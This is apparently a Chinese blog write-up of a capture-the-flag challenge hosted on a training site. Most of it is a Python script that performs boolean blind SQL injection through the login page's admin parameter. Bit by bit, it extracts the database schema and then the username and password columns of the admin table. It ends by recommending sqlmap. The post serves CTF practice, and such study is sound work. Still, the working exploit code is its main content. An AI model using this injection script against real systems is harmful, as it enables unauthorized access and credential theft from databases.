26.看起來有點難
阿新 • • 發佈:2017-08-05
web安全 sql註入 sqli ctf sqlmap
這題進入以後用時間註入測試一下,成功:
之後就是自己寫了個代碼:(寫的比較破,將就看看)
#!/usr/bin/python #coding=utf-8 import requests import sys #計算長度 def length(strs): for i in range(1,100): url = "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=1‘ or if(("+strs+")="+str(i)+",1,0)%23&pass=[d,b,c]&action=login" #print url #sys.exit(0) html = requests.get(url) html.encoding=‘gbk‘ if(html.text.find(u"登錄失敗,錯誤的用戶名和密碼") != -1): return i else: pass #爆破 def blast(lens,strs): s = "" #臨時保存字母 key = ""#保存字符串(字母拼接) for i in range(lens): for j in range(8): url = "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=1‘ or select if(ascii(substring(("+strs+"),"+str(i+1)+",1))%26"+str(2**j)+"="+str(2**j)+",1,0)%23&pass=[d,b,c]&action=login" #print url #sys.exit(0) html = requests.get(url) html.encoding=‘gbk‘ if(html.text.find(u"登錄失敗,錯誤的用戶名和密碼") != -1): s = "1" + s else: s = "0" + s key += chr(int(s,2)) s = "" return key #復數查詢(多個表,多個字段) def plural(name,name_len,num): name_list = []#存儲表名 for i in range(num): names = name name_lens = name_len add = " limit "+str(i)+",1" names = names+add name_lens = name_lens + add tb_s = length(name_lens)#每一個表的長度 tb_name = blast(tb_s,names)#每一個表的名字 name_list.append(tb_name) return name_list def main(): #計算數據庫長度 db_len_sql = "Select length(database())" #db_len= length(db_len_sql) #爆破數據庫名 db_bl_sql = "database()" #db_name = blast(db_len,db_bl_sql) #print db_name #計算表數量 tb_s_sql = "Select count(table_name) from information_schema.tables where table_schema=‘test‘" #tb_s = length(tb_s_sql) #爆破所有表名 tb_name_len = "selEct length(table_name) from information_schema.tables where table_schema=‘test‘"#表名長度 tb_names = "selEct table_name from information_schema.tables where table_schema=‘test‘"#表名 #tb_name_list = plural(tb_names,tb_name_len,tb_s) #爆破字段名數量 col_s_len = "Select count(column_name) from information_schema.columns where table_name=‘admin‘" #col_s = length(col_s_len) #爆破字段名 col_name_len = "selEct length(column_name) from information_schema.columns where table_name=‘admin‘"#表名長度 col_names = "selEct column_name from information_schema.columns where table_name=‘admin‘"#表名 #col_name_list = plural(col_names,col_name_len,col_s) #爆破username字段 flag_sql = "Select count(username) from admin" flag_s = length(flag_sql) flag_len = "Select length(username) from admin" flag_name = "seleCt username from admin" lists = plural(flag_name,flag_len,flag_s) print lists #爆破password字段 flag_sql = "Select count(password) from admin" flag_s = length(flag_sql) flag_len = "Select length(password) from admin" flag_name = "seleCt password from admin" lists = plural(flag_name,flag_len,flag_s) print lists if __name__ == "__main__": main()
將得到的username,password輸入就可以了
還有一個方法就是,直接sqlmap神器,簡單粗暴,簡直不要太好用了,我就不上圖了
本文出自 “11846238” 博客,請務必保留此出處http://11856238.blog.51cto.com/11846238/1953705
26.看起來有點難